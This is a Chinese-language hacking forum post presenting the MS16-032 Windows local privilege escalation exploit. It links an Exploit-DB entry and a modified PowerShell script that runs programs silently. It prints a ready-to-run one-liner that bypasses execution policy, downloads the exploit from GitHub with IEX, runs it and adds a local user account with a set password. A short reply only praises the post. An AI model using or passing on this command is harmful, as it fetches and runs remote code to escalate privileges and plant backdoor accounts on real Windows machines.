HanDs
NO.2

MS16-032 windows本地提权 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

 exploit-db的详情:

https://www.exploit-db.com/exploits/39574/

试用系统:
Tested on x32 Win7, x64 Win8, x64 2k12R2

提权powershell脚本:

Invoke-MS16-032.ps1

测试详情:

Privilege.gif

为了方便使用,对这个脚本进行了简单的修改,可以执行任意程序,并可以添加参数执行(全程无弹框)脚本地址为:
Invoke-MS16-032.ps1

使用方式如下:
添加用户:
demo.gif

运行某程序:
app.gif

远程加用户:
直接执行如下命令,可进行提权并添加用户:

  1.  
    1.  
    1. powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'"
  2.  
  3.  

演示如下:
remote.gif


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
MS16-032 windows 本地提权
#1楼
发帖时间:2016-8-21   |   查看数:0   |   回复数:1
zy1337
圣百合LV21


学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

大神,,,!

2016-8-21 #2楼
游客组